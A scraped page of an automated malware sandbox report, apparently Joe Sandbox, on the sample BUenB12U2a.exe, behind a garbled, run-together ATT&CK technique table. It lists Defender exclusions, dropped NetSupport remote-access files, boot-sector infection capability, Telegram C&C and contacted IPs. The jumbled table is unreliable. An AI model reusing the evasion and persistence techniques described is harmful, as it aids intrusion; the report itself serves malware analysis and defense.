                                System Service Discovery                                		SMB/Windows Admin SharesData from Network Shared Drive22
                                Encrypted Channel                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCron1
                                Registry Run Keys / Startup Folder                                		1
                                Windows Service                                		1
                                Software Packing                                		NTDS4
                                File and Directory Discovery                                		Distributed Component Object ModelInput Capture11
                                Non-Standard Port                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd1
                                Bootkit                                		12
                                Process Injection                                		1
                                Timestomp                                		LSA Secrets35
                                System Information Discovery                                		SSHKeylogging5
                                Non-Application Layer Protocol                                		Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                                Registry Run Keys / Startup Folder                                		1
                                DLL Side-Loading                                		Cached Domain Credentials141
                                Security Software Discovery                                		VNCGUI Input Capture6
                                Application Layer Protocol                                		Data Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                Masquerading                                		DCSync21
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                Valid Accounts                                		Proc Filesystem3
                                Process Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Virtualization/Sandbox Evasion                                		/etc/passwd and /etc/shadow1
                                Application Window Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                                Access Token Manipulation                                		Network Sniffing1
                                System Owner/User Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                                Process Injection                                		Input Capture2
                                System Network Configuration Discovery                                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                Bootkit                                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1621635 Sample: BUenB12U2a.exe Startdate: 22/02/2025 Architecture: WINDOWS Score: 92 67 api.telegram.org 2->67 69 geo.netsupportsoftware.com 2->69 71 3 other IPs or domains 2->71 79 Suricata IDS alerts for network traffic 2->79 81 Multi AV Scanner detection for submitted file 2->81 83 Uses known network protocols on non-standard ports 2->83 87 2 other signatures 2->87 9 BUenB12U2a.exe 89 2->9         started        13 client32.exe 2->13         started        15 client32.exe 2->15         started        signatures3 85 Uses the Telegram API (likely for C&C communication) 67->85 process4 file5 53 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 9->53 dropped 55 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 9->55 dropped 57 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 9->57 dropped 59 66 other files (none is malicious) 9->59 dropped 93 Contains functionality to infect the boot sector 9->93 95 Adds a directory exclusion to Windows Defender 9->95 97 Found pyInstaller with non standard icon 9->97 17 BUenB12U2a.exe 1 14 9->17         started        signatures6 process7 dnsIp8 61 api.telegram.org 149.154.167.220, 443, 49744 TELEGRAMRU United Kingdom 17->61 63 147.45.198.181, 49732, 80 FREE-NET-ASFREEnetEU Russian Federation 17->63 65 api.ipify.org 104.26.13.205, 443, 49739 CLOUDFLARENETUS United States 17->65 45 C:\Users\user\AppData\...\client32.exe, PE32 17->45 dropped 47 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 17->47 dropped 49 C:\Users\user\AppData\...\msvcr100.dll, PE32 17->49 dropped 51 5 other files (none is malicious) 17->51 dropped 89 Adds a directory exclusion to Windows Defender 17->89 22 cmd.exe 1 17->22         started        24 powershell.exe 23 17->24         started        27 WMIC.exe 1 17->27         started        29 cmd.exe 1 17->29         started        file9 signatures10 process11 signatures12 31 client32.exe 16 22->31         started        35 conhost.exe 22->35         started        91 Loading BitLocker PowerShell Module 24->91 37 conhost.exe 24->37         started        39 WmiPrvSE.exe 24->39         started        41 conhost.exe 27->41         started        43 conhost.exe 29->43         started        process13 dnsIp14 73 64.190.113.159, 1488, 49733 TRAVELCLICKCORP1US United States 31->73 75 geo.netsupportsoftware.com 104.26.1.231, 49734, 49735, 49736 CLOUDFLARENETUS United States 31->75 77 Contains functionality to detect sleep reduction / modifications 31->77 signatures15

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.